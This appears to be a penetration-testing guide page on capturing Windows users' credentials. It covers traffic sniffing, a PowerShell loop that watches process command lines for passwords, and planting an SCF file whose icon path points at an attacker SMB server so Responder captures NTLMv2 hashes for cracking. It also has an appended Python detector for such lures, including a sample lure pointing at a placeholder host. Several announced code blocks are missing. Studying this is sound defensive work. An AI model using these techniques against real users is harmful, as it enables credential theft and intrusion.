Interacting with Users
Once we have exhausted all options, we can look at specific techniques to steal credentials from an unsuspecting user by sniffing their network traffic/local commands or attacking a known vulnerable service requiring user interaction.
Traffic Capture
If Wireshark is installed we can use it to capture network traffic.
We can also use a tool like net-creds to sniff passwords and hashes from a live interface or a pcap file.
Process Command Lines
Process command lines are the full commands that are used to execute a process. They include the executable name and any arguments or options passed to it.
They can also contain credentials.
The script below captures process command lines every two seconds and displays the differences between the two snapshots (any command line that appears only in the second snapshot is a newly started process, and may contain credentials passed as arguments):

while($true)
{
    # First snapshot of every running process's command line
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    # Second snapshot; anything new since the first one is printed by Compare-Object
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

We can trigger it remotely:
Vulnerable Service
Some vulnerable services can be used to escalate privileges through user interaction.
An example is CVE-2019-15752, which allowed forcing the execution of an extra executable after the user logs into Docker Desktop.
We could use this vulnerability to steal credentials via a fake login popup.
SCF on File Share
SCF
An SCF (Shell Command File) is a text file that contains instructions for Windows Explorer. It can be used to perform actions like opening a folder, moving up and down directories, showing the Desktop, etc. SCF files are similar to shortcuts but can execute commands. They are simple text files with a .scf extension and contain settings in INI file format.
This SCF file opens C:\Windows:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=OpenFolder
Folder=C:\Windows

[Shell] and [Taskbar] are section headers.
Command=2 under [Shell]: specifies the type of shell operation. 2 usually means "open folder or file."
IconFile=explorer.exe,3: sets the icon for the SCF file, using the fourth icon from explorer.exe (the index is zero-based).
Command=OpenFolder under [Taskbar]: directs the SCF file to open a folder.
Folder=C:\Windows: specifies which folder to open, in this case C:\Windows.
Malicious Exploitation
An SCF file can be manipulated to have the icon file location point to a specific UNC path and have Windows Explorer start an SMB session when the folder where the .scf file resides is accessed.
If we change the IconFile to an SMB server that we control and run a tool such as Responder, Inveigh, or InveighZero, we can often capture NTLMv2 password hashes for any users who browse the share.
Attack
First we create the malicious SCF:
In IconFile we put our attacker IP and a fake share name and icon.
Then we transfer it to the share. We put an @ at the start of the file name so that it sorts to the top of the directory listing, which ensures it is seen and processed by Windows Explorer as soon as the user accesses the share.
On our attacking machine we start Responder on the interface we want to listen to:
(Make sure to open port 445 on the attacker).
When the user visits the share, Responder will capture the NTLMv2 hash and we can crack it with hashcat:
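The two tells described above (an IconFile that points at a UNC path, and the @ prefix used to sort the lure to the top of the listing) are what a defender sweeping a file share for planted SCF files would look for. The following added example (not part of the original page) parses the INI content of .scf files and flags both; the sample files, the host 192.0.2.10 and the share name are constructed placeholders:

```python
import configparser
import os
import re

# Constructed samples (not from the page): the benign "open C:\Windows" file
# described above, and a lure whose IconFile points at a UNC path on a
# placeholder host (192.0.2.10 is a documentation address, not a real host).
SAMPLES = {
    "OpenWindows.scf": "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
                       "[Taskbar]\nCommand=OpenFolder\nFolder=C:\\Windows\n",
    "@readme.scf": "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n"
                   "[Taskbar]\nCommand=ToggleDesktop\n",
}

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # \\host\... ; group 1 is the host


def inspect_scf(name, text):
    """Return the reasons an SCF file looks like an NTLM-capture lure ([] if clean)."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error as exc:
        return ["unparseable INI content (%s)" % type(exc).__name__]
    # Explorer loads the icon named in [Shell] IconFile; "file,index" selects the icon.
    icon_path = parser.get("Shell", "IconFile", fallback="").split(",")[0].strip()
    reasons = []
    match = UNC_RE.match(icon_path)
    if match:
        reasons.append("IconFile fetches its icon from remote host %s over SMB" % match.group(1))
    if name.startswith("@"):
        reasons.append("name starts with '@' so it sorts to the top of the share listing")
    return reasons


def scan_files(files):
    """files: {name: content}. Returns {name: reasons} for every suspicious SCF."""
    flagged = {}
    for name, text in files.items():
        reasons = inspect_scf(name, text)
        if reasons:
            flagged[name] = reasons
    return flagged


def scan_directory(root):
    """Walk a mounted share and return {path: reasons} for suspicious .scf files."""
    found = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(".scf"):
                with open(os.path.join(dirpath, n), encoding="utf-8", errors="replace") as fh:
                    found[os.path.join(dirpath, n)] = fh.read()
    return scan_files(found)
```

Running scan_files(SAMPLES) flags only @readme.scf with both reasons; point scan_directory at a mounted share to sweep it.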
LNK files
This SCF attack doesn't work on Server 2019 hosts, but the same can be achieved with LNK files, either using a tool such as Lnkbomb or using a few lines of PowerShell: